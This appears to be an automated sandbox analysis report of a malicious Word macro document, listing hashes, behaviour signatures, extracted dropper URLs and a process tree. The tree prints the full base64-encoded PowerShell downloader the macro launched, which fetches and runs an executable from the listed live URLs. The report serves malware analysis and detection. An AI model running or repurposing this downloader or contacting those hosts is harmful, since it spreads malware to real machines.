Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/09/2024, 22:53

General

  • Target

    ce19b766f1b2d8178f63e1d1bd745a63_JaffaCakes118.doc

  • Size

    194KB

  • MD5

    ce19b766f1b2d8178f63e1d1bd745a63

  • SHA1

    683370edc9b84f4ec7ea7dc38d24de3564c5f85e

  • SHA256

    9f038a3f8faa7d88948648de22b5ab1fdd3cc1d598fc1125ff950daa9fadc4b1

  • SHA512

    b41b8fff13f0fe57cf4560dd762e92740e1e092684efcf6211ff0572da3bcbb96b847970ff80b14103e11302647d86211ca1d52349a4c819129618a7abcc2e20

  • SSDEEP

    1536:2rdi1Ir77zOH98Wj2gpngh+a9NIul8oPhEPmRl6VOJ4L:2rfrzOH98ipgBIul8uWP+l6VOJ4L

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://vstbar.com/wp-admin/Hs/

exe.dropper

http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/

exe.dropper

http://shahqutubuddin.org/U/

exe.dropper

http://cybersign-001-site5.gtempurl.com/2xwzq/bve/

exe.dropper

https://star-speed.vip/wp-admin/Ttv/

exe.dropper

https://treneg.com.br/rfvmbh/a/

exe.dropper

https://cimsjr.com/hospital/x2f/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ce19b766f1b2d8178f63e1d1bd745a63_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1896

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            80a4f54f0d40f42b87e05eb9d421179d

            SHA1

            2946f4452a32d988ccec453ce56cc051e7d85e6b

            SHA256

            a6459bd56e46ea98e50e9586ba2745e3fdc175783c2862432678daaba7593730

            SHA512

            bbaac96b4c1cf71be034b9099a00f9593a1b90a33b1fcc7ecb5874f8a13fce913e4ae6a06a3214d6fc5daed77fd6e7381cd950b8fcadbfa73b633c80406bbe63

          • memory/1896-40-0x000000001B610000-0x000000001B8F2000-memory.dmp

            Filesize

            2.9MB

          • memory/1896-41-0x0000000002820000-0x0000000002828000-memory.dmp

            Filesize

            32KB

          • memory/2292-26-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-28-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-8-0x0000000005D20000-0x0000000005E20000-memory.dmp

            Filesize

            1024KB

          • memory/2292-9-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-10-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-11-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-21-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-23-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-22-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-25-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-18-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-16-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-15-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-14-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-13-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-12-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-17-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-0-0x000000002FCB1000-0x000000002FCB2000-memory.dmp

            Filesize

            4KB

          • memory/2292-7-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-27-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-19-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-24-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-33-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-32-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-30-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-34-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-29-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-31-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-6-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-2-0x00000000719FD000-0x0000000071A08000-memory.dmp

            Filesize

            44KB

          • memory/2292-46-0x00000000719FD000-0x0000000071A08000-memory.dmp

            Filesize

            44KB

          • memory/2292-47-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-48-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-50-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-51-0x00000000003F0000-0x00000000004F0000-memory.dmp

            Filesize

            1024KB

          • memory/2292-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2292-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2292-69-0x00000000719FD000-0x0000000071A08000-memory.dmp

            Filesize

            44KB